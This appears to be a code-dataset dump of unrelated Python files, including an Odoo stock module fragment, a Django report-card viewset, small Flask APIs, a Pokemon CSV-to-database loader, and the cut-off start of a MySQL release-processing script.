[('readonly', True)]}),\n 'product_id': fields.many2one('product.product', 'Product', required=True, select=True, states={'confirm': [('readonly', True)], 'done': [('readonly', True)]}),\n 'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True, states={'confirm': [('readonly', True)], 'done': [('readonly', True)]}),\n 'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), states={'confirm': [('readonly', True)], 'done': [('readonly', True)]}),\n 'prod_lot_id': fields.many2one('stock.production.lot', 'Serial Number', domain=\"[('product_id','=',product_id)]\", states={'confirm': [('readonly', True)], 'done': [('readonly', True)]}),\n }\nstock_inventory_line()\n\nclass stock_warehouse(osv.osv):\n _inherit = \"stock.warehouse\"\n\n _columns = {\n 'code' : fields.char('Warehouse Code', size=32, select=True),\n }\n\nclass seconds_line(orm.Model):\n _name = 'seconds.line'\n\n _columns = {\n 'picking_id': fields.many2one('stock.picking', 'Picking', required=True, select=True, ),\n 'product_id': fields.many2one('product.product', 'Product', required=True, select=True, ),\n 'qty' : fields.integer('QTY', required=True),\n }\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n\n","repo_name":"haitunzzz/ODOO","sub_path":"stock_enhance/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":51161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26379957073","text":"import json\nfrom django.http import FileResponse\nfrom rest_framework import viewsets\nfrom results.serializers.report import ComputedReportSerializer\nfrom results.utils.pdf_report.competency_report import CompetencePDFReport\nfrom results.utils.pdf_report.termly_report import TermlyPDFReport\nfrom utils import get_host_name\nfrom results.utils import compute_student_report\nfrom results.utils.pdf_report.bulk_report import BulkPDFReport\nfrom ..models import ClassRoom, GradingSystem, Period, Report, Student\nfrom ..serializers import ReportSerializer\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom ..filters import ReportFilter\nimport os\nfrom django.views.decorators.cache import cache_page\nfrom django.core.cache import cache\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.vary import vary_on_cookie, vary_on_headers\n\n\nclass ReportViewSet(viewsets.ModelViewSet):\n queryset = Report.objects.all()\n serializer_class = ReportSerializer\n\n def get_queryset(self):\n queryset = super().get_queryset()\n class_room_pk = self.kwargs.get('class_room_pk')\n if class_room_pk:\n queryset = queryset.filter(promo_from_class_room=class_room_pk)\n params = self.request.query_params\n f = ReportFilter(queryset, params)\n queryset = f.filter()\n return queryset\n\n @action(detail=False, methods=['GET'], name='get_count', url_path='count')\n def get_count(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n count = queryset.count()\n return Response({'count': count})\n\n # @method_decorator(cache_page(60 * 15))\n @action(detail=False,\n methods=['GET'],\n name='get_computed_student_report',\n url_path=r'computed/(?P<student_id>[\\w-]+)')\n def get_student_computed_report(self, request, *args, **kwargs):\n params = self.request.query_params\n period = Period.objects.filter(id=params.get('period')).first()\n if not period:\n period = Period.objects.latest()\n student = Student.objects.filter(id=kwargs.get('student_id')).first()\n level_group = student.class_room.level.level_group\n grading_system = GradingSystem.objects.filter(\n is_default=True, level_group=level_group).first()\n report, computed_report = compute_student_report(\n student, grading_system, period)\n serializer = ComputedReportSerializer(computed_report)\n report.computation = serializer.data\n report.save()\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['POST'],\n name='download_student_report',\n url_path=r'computed/(?P<student_id>[\\w-]+)/download')\n def download_student_report(self, request, *args, **kwargs):\n params = self.request.query_params\n period = Period.objects.filter(id=params.get('period')).first()\n if not period:\n period = Period.objects.latest()\n student = Student.objects.filter(id=kwargs.get('student_id')).first()\n level_group = student.class_room.level.level_group\n grading_system = GradingSystem.objects.filter(\n is_default=True, level_group=level_group).first()\n res = cache.get(f'computed_report{student.id}')\n if res:\n report, computed_report = res\n else:\n report, computed_report = cache.get_or_set(\n f'computed_report{student.id}',\n compute_student_report(student, grading_system, period))\n serializer = ComputedReportSerializer(computed_report)\n columns = request.data.get('columns')\n report_type = request.data.get('report_type')\n if report_type == 'activity':\n pdf_report = CompetencePDFReport(computed_report,\n columns=columns,\n grading_system=grading_system,\n period=period)\n else:\n pdf_report = TermlyPDFReport(computed_report,\n columns=columns,\n grading_system=grading_system,\n period=period)\n\n doc = pdf_report.run()\n filename = os.path.basename(doc.filename)\n host = get_host_name(request)\n file_url = f'{host}/media/{filename}'\n report.computation = serializer.data\n report.save()\n return Response({'file_url': file_url})\n\n @action(detail=True,\n methods=['GET'],\n name='get_report_result',\n url_path='result')\n def get_report_result(self, request, pk, *args, **kwargs):\n params = self.request.query_params\n grading_system = GradingSystem.objects.filter(\n id=params.get('grading_system')).first()\n period = Period.objects.filter(id=params.get('period')).first()\n if not grading_system:\n grading_system = GradingSystem.objects.first()\n if not period:\n period = Period.objects.latest()\n\n report = Report.objects.get(id=pk)\n student_id = report.student_id\n report = compute_student_report(student_id, grading_system, period)\n return Response({\"points\": sum([subj.points for subj in report])})\n\n @action(detail=False,\n methods=['PUT'],\n name='bulk_competency_report_comment',\n url_path='competency/comment/bulk')\n def bulk_competency_report_comment(self, request, *args, **kwargs):\n data = request.data\n query = Report.objects.filter(\n competency_score__gte=data.get('competency_score__gte'),\n competency_score__lte=data.get('competency_score__lte'),\n student__class_room=data.get('student__class_room'),\n )\n overwrite = data.get('overwrite')\n teacher_group = data.get('teacher_group')\n comment = data.get('comment')\n if teacher_group == 'head':\n if not overwrite:\n query = query.filter(competency_head_teacher_comment='')\n query.update(competency_head_teacher_comment=comment)\n else:\n if not overwrite:\n query = query.filter(competency_class_teacher_comment='')\n query.update(competency_class_teacher_comment=comment)\n serializer = self.get_serializer(query, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['PUT'],\n name='bulk_termly_report_comment',\n url_path='termly/comment/bulk')\n def bulk_termly_report_comment(self, request, *args, **kwargs):\n data = request.data\n level_group_name = data.get('level_group_name')\n if level_group_name == 'A':\n query = Report.objects.filter(\n points__gte=data.get('points__gte'),\n points__lte=data.get('points__lte'),\n student__class_room=data.get('student__class_room'))\n else:\n query = Report.objects.filter(\n aggregates__gte=data.get('aggregates__gte'),\n aggregates__lte=data.get('aggregates__lte'))\n overwrite = data.get('overwrite')\n teacher_group = data.get('teacher_group')\n comment = data.get('comment')\n if teacher_group == 'head':\n if not overwrite:\n query = query.filter(head_teacher_comment='')\n query.update(head_teacher_comment=comment)\n else:\n if not overwrite:\n query = query.filter(class_teacher_comment='')\n query.update(class_teacher_comment=comment)\n serializer = self.get_serializer(query, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['PUT'],\n name='update_report_comment',\n url_path='comment')\n def update_report_comment(self, request, *args, **kwargs):\n data = request.data\n queryset1 = Report.objects.filter(id__in=data.get('reports'))\n queryset = queryset1\n overwrite = data.get('overwrite')\n del data['reports']\n del data['overwrite']\n if not overwrite:\n if data.get('class_teacher_comment'):\n queryset = queryset.filter(class_teacher_comment=\"\")\n if data.get('head_teacher_comment'):\n queryset = queryset.filter(head_teacher_comment=\"\")\n queryset.update(**data)\n serializer = self.get_serializer(queryset1, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['PUT'],\n name='update_report_competency_comment',\n url_path='competency/comment')\n def update_report_competency_comment(self, request, *args, **kwargs):\n data = request.data\n queryset1 = Report.objects.filter(id__in=data.get('reports'))\n queryset = queryset1\n overwrite = data.get('overwrite')\n del data['reports']\n del data['overwrite']\n if not overwrite:\n if data.get('competency_class_teacher_comment'):\n queryset = queryset.filter(competency_class_teacher_comment=\"\")\n if data.get('competency_head_teacher_comment'):\n queryset = queryset.filter(competency_head_teacher_comment=\"\")\n queryset.update(**data)\n serializer = self.get_serializer(queryset1, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['POST'],\n name='download_class_room_report',\n url_path=r'computed/class-rooms/(?P<class_room_id>[\\w-]+)/download'\n )\n def download_class_room_reports(self, request, *args, **kwargs):\n data = self.request.data\n params = self.request.query_params\n class_room_id = kwargs.get('class_room_id')\n\n period = Period.objects.filter(id=params.get('period')).first()\n if not period:\n period = Period.objects.latest()\n\n class_room = ClassRoom.objects.filter(id=class_room_id).first()\n grading_system = GradingSystem.objects.filter(\n is_default=True, level_group=class_room.level.level_group).first()\n students = Student.objects.filter(class_room=class_room).all()\n computed_reports = [\n compute_student_report(stud, grading_system, period)[1]\n for stud in students\n ]\n report_type = data.get('report_type', 'assessment')\n columns = data.get('columns', {'code': True})\n res = cache.get(f'class_room_report_{class_room.id}')\n if res:\n bulk_report = res\n else:\n bulk_report = BulkPDFReport(computed_reports, report_type, columns,\n grading_system, period)\n cache.set(f'class_room_report_{class_room.id}', bulk_report)\n doc = bulk_report.run()\n filename = os.path.basename(doc.filename)\n host = get_host_name(request)\n file_url = f'{host}/media/{filename}'\n return Response({'file_url': file_url})\n\n @action(detail=False,\n methods=['POST'],\n name='add_promotions',\n url_path='promotions/add')\n def add_promotions(self, request, *args, **kwargs):\n data = request.data\n report_ids = data.get('reports')\n to_class_room = data.get('promo_to_class_room')\n from_class_room = data.get('promo_from_class_room')\n report_qs = Report.objects.filter(id__in=report_ids)\n report_qs.update(promo_from_class_room=from_class_room,\n promo_to_class_room=to_class_room)\n serializer = self.get_serializer(report_qs, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['PUT'],\n name='approve_promotions',\n url_path='approve')\n def approve_promotions(self, request, *args, **kwargs):\n data = request.data\n report_ids = data.get('promotions')\n report_qs = Report.objects.filter(id__in=report_ids)\n report_qs.update(promo_is_approved=True)\n serializer = self.get_serializer(report_qs, many=True)\n return Response(serializer.data)\n\n @action(detail=False,\n methods=['PUT'],\n name='reject_promotions',\n url_path='reject')\n def reject_promotions(self, request, *args, **kwargs):\n data = request.data\n report_ids = data.get('promotions')\n report_qs = Report.objects.filter(id__in=report_ids)\n report_qs.update(promo_is_approved=False)\n serializer = self.get_serializer(report_qs, many=True)\n return Response(serializer.data)","repo_name":"samuelitwaru/wex-erp","sub_path":"results/views/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":12771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30464221796","text":"# -*- coding: UTF-8 -*- \nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\nfrom flask import Flask, request\nimport threading\nimport time\nimport pymysql\nfrom ariori import apriori,draw,loadDataSet\nfrom mysql import mysql_test,mysql_apriori,mysql_number,mysql_iris\nfrom iris import load_iris,cluster1,iris_data_scatter1\nfrom tree import tree,get_file,conver_img\nfrom number import load_number,number\n\n# configurations\nDEBUG = False\n\n# instantiate the app\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# enable CORS\nCORS(app, resources={r'/*': {'origins': '*'}})\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/testapipost', methods=['post'])\ndef test():\n jobs=[{}]\n data = request.get_json(silent=True)\n x = data['firstName']\n x = int(x)\n a=mysql_test(x)\n print(x)\n jobs[0]=a \n print (jobs)\n return jsonify({'jobs':jobs})\n \n@app.route('/aprioriget', methods=['get'])\ndef aprioriget(): \n ad=loadDataSet()\n apriori_data=mysql_apriori()\n L, supportData = apriori(ad,minSupport=0.2)\n apriori_draw=draw(L[1],supportData)\n return jsonify({'aprioridata':apriori_data,'aprioridraw':apriori_draw})\n\n@app.route('/irisget', methods=['get'])\ndef irisget(): \n iris_data=mysql_iris()\n X,y = load_iris()\n x,iris_result_scatter,bar_num = cluster1(X,y)\n iris_data_scatter=iris_data_scatter1(x,y)\n return jsonify({'irisdata':iris_data,'irisdatascatter':iris_data_scatter,\n 'barnum':bar_num,'irisresultscatter':iris_result_scatter\n })\n\n@app.route('/numberget', methods=['get'])\ndef numberget(): \n number_data=mysql_number()\n x,y=load_number()\n inlier,outlier,test_data,l1,l2,l3,l4=number(x,y)\n return jsonify({'numberdata':number_data,\"inlier\":inlier,\n 'outlier':outlier,'test_data':test_data,\n 'l1':l1,'l2':l2,'l3':l3,'l4':l4\n })\n\n@app.route('/treeget', methods=['get'])\ndef treeget(): \n iris_data=mysql_iris()\n X,y = load_iris()\n tree(X,y)\n pdf_dir=[]\n pdf_dir=get_file(pdf_dir)\n conver_img(pdf_dir)\n return jsonify({'irisdata':iris_data})\n\nif __name__ == '__main__':\n\n # 运行flask app\n app.run(host='127.0.0.1',port=5000) #debug=True\n","repo_name":"d12597/-","sub_path":"后端/app(1).py","file_name":"app(1).py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13447728226","text":"from flask import Flask, request, jsonify\nfrom main import currencyconverter \nfrom flask import request\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\nconverter=currencyconverter()\n@app.route('/', methods=['GET'])\ndef home():\n\tjson=converter.rates()\n\treturn jsonify(json)\n@app.route('/chart', methods=['GET'])\ndef chart():\n\targs = request.args\n\tFrom = args['From']\n\tTo = args['To']\n\tjson=converter.chart(From,To)\n\treturn jsonify(json)\n@app.route('/statistics', methods=['GET'])\ndef statistic():\n\targs = request.args\n\tFrom = args['From']\n\tTo = args['To']\n\tjson=converter.statistics(From,To)\n\treturn jsonify(json)\t\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0', port=3003)","repo_name":"yunusaltuntas/curency-scrapy","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18393720985","text":"\nimport csv\nimport time\nimport pathlib\n\nfrom ..Log import Log\nfrom . import SQL\n\n\nasync def ingest_csv(csv_dir):\n log = Log()\n dex = {}\n\n log.info(\"Load pokemon.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/pokemon.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n raw_dex = []\n for entry in reader:\n raw_dex.append(dict(entry))\n for key in raw_dex[-1]:\n try:\n raw_dex[-1][key] = int(raw_dex[-1][key])\n except ValueError:\n pass\n\n # We are unable to guarentee that ALL entries will have all data,\n # so we load them with default NULLs into the DB\n for entry in raw_dex:\n pokemon_id = entry['id']\n dex[pokemon_id] = {}\n dex[pokemon_id]['gender_ratio'] = None\n dex[pokemon_id]['catch_rate'] = None\n dex[pokemon_id]['hatch_time'] = None\n dex[pokemon_id]['base_happiness'] = None\n dex[pokemon_id]['type2'] = None\n\n\n for entry in raw_dex:\n pokemon_id = entry['id']\n dex[pokemon_id]['pokemon_id'] = pokemon_id\n dex[pokemon_id]['identifier'] = entry['identifier']\n dex[pokemon_id]['height'] = entry['height']\n dex[pokemon_id]['weight'] = entry['weight']\n dex[pokemon_id]['base_xp'] = entry['base_experience']\n log.info(f\"pokemon loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(\"Load pokemon_stats.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/pokemon_stats.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n raw_stats = []\n for entry in reader:\n raw_stats.append(dict(entry))\n for key in raw_stats[-1]:\n try:\n raw_stats[-1][key] = int(raw_stats[-1][key])\n except ValueError:\n pass\n\n stat_lookup = {1: \"hp\", 2: \"attack\", 3: \"defense\", 4: \"sp_attack\", 5: \"sp_defense\", 6: \"speed\"}\n for entry in raw_stats:\n pokemon_id = entry['pokemon_id']\n base_key = \"base_\" + stat_lookup[entry['stat_id']]\n effort_key = \"effort_\" + stat_lookup[entry['stat_id']]\n dex[pokemon_id][base_key] = entry['base_stat']\n dex[pokemon_id][effort_key] = entry['effort']\n log.info(f\"pokemon_stats loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(\"Load pokemon_species.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/pokemon_species.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n species_stats = []\n for entry in reader:\n species_stats.append(dict(entry))\n for key in species_stats[-1]:\n try:\n species_stats[-1][key] = int(species_stats[-1][key])\n except ValueError:\n pass\n\n for entry in species_stats:\n pokemon_id = entry['id']\n dex[pokemon_id]['gender_ratio'] = entry['gender_rate']\n dex[pokemon_id]['catch_rate'] = entry['capture_rate']\n dex[pokemon_id]['hatch_time'] = entry['hatch_counter']\n dex[pokemon_id]['base_happiness'] = entry['base_happiness']\n log.info(f\"pokemon_species loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(\"Load moves.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/moves.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n moves = []\n for entry in reader:\n moves.append(dict(entry))\n for key in moves[-1]:\n try:\n moves[-1][key] = int(moves[-1][key])\n except ValueError:\n pass\n\n # ID is not used, remap it to move_id,\n for entry in moves:\n entry['move_id'] = entry['id']\n del entry['id']\n entry['pp_max'] = entry['pp']\n del entry['pp']\n log.info(f\"moves loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(\"Load move_effect_prose.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/move_effect_prose.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n move_effect_prose = []\n for entry in reader:\n move_effect_prose.append(dict(entry))\n for key in move_effect_prose[-1]:\n try:\n move_effect_prose[-1][key] = int(move_effect_prose[-1][key])\n except ValueError:\n pass\n\n # ID is not used, remap it to move_id,\n for entry in move_effect_prose:\n entry['effect_id'] = entry['move_effect_id']\n del entry['move_effect_id']\n log.info(f\"move_effect_prose loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(\"Load pokemon_moves.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/pokemon_moves.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n pokemon_moves = []\n for entry in reader:\n pokemon_moves.append(dict(entry))\n for key in pokemon_moves[-1]:\n try:\n pokemon_moves[-1][key] = int(pokemon_moves[-1][key])\n except ValueError:\n pass\n log.info(f\"pokemon_moves loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(\"Load pokemon_move_method_prose.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/pokemon_move_method_prose.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n pokemon_move_method_prose = []\n for entry in reader:\n pokemon_move_method_prose.append(dict(entry))\n for key in pokemon_move_method_prose[-1]:\n try:\n pokemon_move_method_prose[-1][key] = int(pokemon_move_method_prose[-1][key])\n except ValueError:\n pass\n log.info(f\"pokemon_move_method_prose loaded in {time.time()-t_step:.3f}s\")\n\n\n # Handle Pokemon\n log.info(\"Load types.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/types.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n types = []\n for entry in reader:\n types.append(dict(entry))\n for key in types[-1]:\n try:\n types[-1][key] = int(types[-1][key])\n except ValueError:\n pass\n temp = tuple(types)\n types = {}\n for entry in temp:\n types[entry['id']] = entry['identifier']\n log.info(f\"types loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(\"Load pokemon_types.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/pokemon_types.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n pokemon_types = []\n for entry in reader:\n pokemon_types.append(dict(entry))\n for key in pokemon_types[-1]:\n try:\n pokemon_types[-1][key] = int(pokemon_types[-1][key])\n except ValueError:\n pass\n\n for entry in pokemon_types:\n pokemon_id = entry['pokemon_id']\n if entry['slot'] == 1:\n dex[pokemon_id]['type1'] = entry['type_id']\n elif entry['slot'] == 2:\n dex[pokemon_id]['type2'] = entry['type_id']\n else:\n raise KeyError(f\"Unknown slot '{entry['slot']}'\")\n log.info(f\"pokemon_types loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(\"Load type_efficacy.csv\")\n t_step = time.time()\n with open(csv_dir / \"pokemon/type_efficacy.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n type_efficacy = []\n for entry in reader:\n type_efficacy.append(dict(entry))\n for key in type_efficacy[-1]:\n try:\n type_efficacy[-1][key] = int(type_efficacy[-1][key])\n except ValueError:\n pass\n log.info(f\"type_efficacy loaded in {time.time()-t_step:.3f}s\")\n\n # Handle world generation\n\n log.info(\"Load encounters.csv\")\n t_step = time.time()\n with open(csv_dir / \"world/encounters.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n encounters = []\n for entry in reader:\n encounters.append(dict(entry))\n for key in encounters[-1]:\n try:\n encounters[-1][key] = int(encounters[-1][key])\n except ValueError:\n pass\n log.info(f\"encounters loaded in {time.time()-t_step:.3f}s\")\n\n log.info(\"Load location_names.csv\")\n t_step = time.time()\n with open(csv_dir / \"world/location_names.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n location_names = []\n for entry in reader:\n if entry['local_language_id'] != '9':\n continue\n location_names.append(dict(entry))\n for key in location_names[-1]:\n try:\n location_names[-1][key] = int(location_names[-1][key])\n except ValueError:\n pass\n log.info(f\"location_names loaded in {time.time()-t_step:.3f}s\")\n\n log.info(\"Load zone_connections.csv\")\n t_step = time.time()\n with open(csv_dir / \"world/zone_connections.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n zone_connections = []\n for entry in reader:\n zone_connections.append(dict(entry))\n for key in zone_connections[-1]:\n try:\n zone_connections[-1][key] = int(zone_connections[-1][key])\n except ValueError:\n pass\n log.info(f\"zone_connections loaded in {time.time()-t_step:.3f}s\")\n\n output = {}\n output['encounters'] = encounters\n output['location_names'] = location_names\n output['move_effect_prose'] = move_effect_prose\n output['moves'] = moves\n output['pokedex'] = dex\n output['pokemon_move_method_prose'] = pokemon_move_method_prose\n output['pokemon_moves'] = pokemon_moves\n output['type_efficacy'] = type_efficacy\n output['types'] = types\n output['zone_connections'] = zone_connections\n\n return output\n\n\nasync def populate():\n \"\"\"Attmept to populate basic tables\n \"\"\"\n\n log = Log()\n sql = SQL.SQL()\n\n log.info(\"Loading pokedex data\")\n\n csv_dir = pathlib.Path(\"data/\")\n t_start_csv = time.time()\n data = await ingest_csv(csv_dir)\n\n\n log.info(f\"Full csv load took {time.time()-t_start_csv:.3f}s\")\n\n\n log.info(f\"Must load {len(data['pokedex'])} pokedex rows\")\n t_start_sql = time.time()\n t_step = time.time()\n cur = sql.cur\n for key in data['pokedex']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO pokedex\n (\n pokemon_id,\n identifier,\n height,\n weight,\n base_xp,\n base_hp,\n base_attack,\n base_defense,\n base_sp_attack,\n base_sp_defense,\n base_speed,\n effort_hp,\n effort_attack,\n effort_defense,\n effort_sp_attack,\n effort_sp_defense,\n effort_speed,\n gender_ratio,\n catch_rate,\n hatch_time,\n type1,\n type2\n ) VALUES (\n :pokemon_id,\n :identifier,\n :height,\n :weight,\n :base_xp,\n :base_hp,\n :base_attack,\n :base_defense,\n :base_sp_attack,\n :base_sp_defense,\n :base_speed,\n :effort_hp,\n :effort_attack,\n :effort_defense,\n :effort_sp_attack,\n :effort_sp_defense,\n :effort_speed,\n :gender_ratio,\n :catch_rate,\n :hatch_time,\n :type1,\n :type2\n )\"\"\"\n cur.execute(cmd, data['pokedex'][key])\n log.info(f\"pokedex loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load {len(data['moves'])} moves rows\")\n t_start_sql = time.time()\n t_step = time.time()\n cur = sql.cur\n for entry in data['moves']:\n # log.info(entry)\n cmd = \"\"\"INSERT INTO moves\n (\n move_id,\n identifier,\n generation_id,\n type_id,\n power,\n pp_max,\n accuracy,\n priority,\n target_id,\n damage_class_id,\n effect_id,\n effect_chance,\n contest_type_id,\n contest_effect_id,\n super_contest_effect_id\n ) VALUES (\n :move_id,\n :identifier,\n :generation_id,\n :type_id,\n :power,\n :pp_max,\n :accuracy,\n :priority,\n :target_id,\n :damage_class_id,\n :effect_id,\n :effect_chance,\n :contest_type_id,\n :contest_effect_id,\n :super_contest_effect_id\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"moves loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load {len(data['pokemon_moves'])} pokemon_moves rows\")\n t_start_sql = time.time()\n t_step = time.time()\n cur = sql.cur\n for entry in data['pokemon_moves']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO pokemon_moves\n (\n pokemon_id,\n version_group_id,\n move_id,\n pokemon_move_method_id,\n level\n ) VALUES (\n :pokemon_id,\n :version_group_id,\n :move_id,\n :pokemon_move_method_id,\n :level\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"pokemon_moves loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load {len(data['move_effect_prose'])} move_effect_prose rows\")\n t_start_sql = time.time()\n t_step = time.time()\n cur = sql.cur\n for entry in data['move_effect_prose']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO move_effect_prose\n (\n effect_id,\n local_language_id,\n short_effect,\n effect\n ) VALUES (\n :effect_id,\n :local_language_id,\n :short_effect,\n :effect\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"move_effect_prose loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load {len(data['pokemon_move_method_prose'])} pokemon_move_method_prose rows\")\n t_start_sql = time.time()\n t_step = time.time()\n cur = sql.cur\n for entry in data['pokemon_move_method_prose']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO pokemon_move_method_prose\n (\n pokemon_move_method_id,\n local_language_id,\n name,\n description\n ) VALUES (\n :pokemon_move_method_id,\n :local_language_id,\n :name,\n :description\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"pokemon_move_method_prose loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load types {len(data['types']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for key in data['types']:\n cmd = \"\"\"INSERT INTO types\n (\n type_id,\n identifier\n ) VALUES (\n :type_id,\n :identifier\n )\"\"\"\n type_id = key\n identifier = data['types'][key]\n cur.execute(cmd, locals())\n log.info(f\"types loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load type_efficacy {len(data['type_efficacy']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for entry in data['type_efficacy']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO type_efficacy\n (\n damage_type_id,\n target_type_id,\n damage_factor\n ) VALUES (\n :damage_type_id,\n :target_type_id,\n :damage_factor\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"type_efficacy loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load encounters {len(data['encounters']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for entry in data['encounters']:\n # log.info(data[key])\n entry['location_id'] = entry['id']\n cmd = \"\"\"INSERT INTO encounters\n (\n location_id,\n encounter_slot_id,\n location_area_id,\n max_level,\n min_level,\n pokemon_id,\n version_id\n ) VALUES (\n :location_id,\n :encounter_slot_id,\n :location_area_id,\n :max_level,\n :min_level,\n :pokemon_id,\n :version_id\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"encounters loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load locations {len(data['location_names']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for entry in data['location_names']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO locations\n (\n location_id,\n name\n ) VALUES (\n :location_id,\n :name\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"location_names loaded in {time.time()-t_step:.3f}s\")\n\n\n log.info(f\"Must load zone_connections {len(data['zone_connections']):,d} rows\")\n t_step = time.time()\n cur = sql.cur\n for entry in data['zone_connections']:\n # log.info(data[key])\n cmd = \"\"\"INSERT INTO zone_connections\n (\n location_id_1,\n location_id_2,\n distance_forward,\n distance_backward\n ) VALUES (\n :location_id_1,\n :location_id_2,\n :distance_forward,\n :distance_backward\n )\"\"\"\n cur.execute(cmd, entry)\n log.info(f\"zone_connections loaded in {time.time()-t_step:.3f}s\")\n\n log.info(f\"SQL Population took {time.time()-t_start_sql:.3f}s\")\n log.info(f\"Total Population took {time.time()-t_start_csv:.3f}s\")\n\n await sql.commit(now=True)\n\n log.info(\"Populate wites completed\")\n","repo_name":"EEsDoNotItNow/PokeBot","sub_path":"bot/code/SQL/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":17924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73402923687","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys, os, time\nimport threading\ntry:\n\timport queue\nexcept ImportError:\n\timport Queue as queue\ntry:\n\timport cymysql as mdb\nexcept ImportError:\n\tsys.exit(\"\\nPlease install cymysql for python 3, \\ninformation can be found in INSTALL.txt\\n\")\nimport subprocess\nimport string\nimport lib.info as info\nimport signal\nimport datetime\n\nthreads = 5\nstart_time = time.time()\npathname = os.path.abspath(os.path.dirname(sys.argv[0]))\nconf = info.readConfig()\n\n#create the connection to mysql\ncon = None\ncon = mdb.connect(host=conf['DB_HOST'], user=conf['DB_USER'], passwd=conf['DB_PASSWORD'], db=conf['DB_NAME'], port=int(conf['DB_PORT']), unix_socket=conf['DB_SOCKET'])\ncon.autocommit(True)\ncur = con.cursor()\n\ncur.execute(\"UPDATE releases SET reqidstatus = -1 WHERE reqidstatus = 0 AND nzbstatus = 1 AND relnamestatus = 1 AND name REGEXP '^\\\\[[[:digit:]]+\\\\]' = 0\")\ncur.execute(\"SELECT r.ID, r.name, g.name groupName FROM releases r LEFT JOIN groups g ON r.groupID = g.ID WHERE relnamestatus = 1 AND nzbstatus = 1 AND reqidstatus = 0 AND r.name REGEXP '^\\\\[[[:digit:]]+\\\\]' = 1 limit 1000\")\ndatas = cur.fetchall()\n\nif not datas:\n\tprint(\"No 